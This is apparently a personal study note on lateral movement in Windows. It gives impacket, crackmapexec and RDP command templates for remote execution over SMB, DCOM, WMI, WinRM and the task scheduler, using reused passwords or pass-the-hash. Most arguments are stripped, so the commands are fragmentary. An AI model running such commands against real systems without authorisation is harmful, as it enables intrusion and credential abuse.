Password ReUse

Windows

With impacket or Crackmapexec:

SMB (Serveur Message Block)

Uses port 445 - (I had to add / for each end of command to prevent quartz from crashing) impacket-psexec /:@ impacket-smbexec /:@ cme smb —exec-method smbexec -d -u -p -x Pass-the-hash : impacket-psexec -hashes : /@ impacket-smbexec -hashes : /@ cme smb —exec-method smbexec -d -u -H -x

DCOM

Allows execution of programs on other computers - MS RPC - 135 445 port and usually 49751 impacket-dcomexec /:@ cme smb —exec-method mmcexec -d -u -p -x Pass-the-hash : impacket-dcomexec -hashes : /@ cme smb —exec-method mmcexec -d -u -H -x

WMI

Windows management instrumentation - Watch computers on the network since its uses MS RPC it also uses 135,445 and usually 50911 impacket-wmiexec /:@ crackmapexec smb -d -u -p -x Pass-the-hash : impacket-wmiexec -hashes : /@ crackmapexec smb -d -u -H LM:NTLM/ -x

WinRM

Used WMI crackmapexec winrm -d -u -p -x Pass-the-hash : crackmapexec winrm -d -u -H LM:NTLM/ -x

AtScv

Cron-like of Windows, accessible through SMB usually on 445 impacket-atexec /:@ crackmapexec smb —exec-method atexec -d -u -p -x Pass-the-hash : impacket-atexec -hashes : /@ crackmapexec smb —exec-method atexec -d -u -H LM:NTLM/ -x

RDP

Remote Desktop Protocol xfreerdp /d: /u: /p: /v: rdesktop -d -u -p Pass-the-hash : xfreerdp /d: /u: /pth: /v:

Linux

SSH / su -u user

A hobbyist' digital garden

Explorer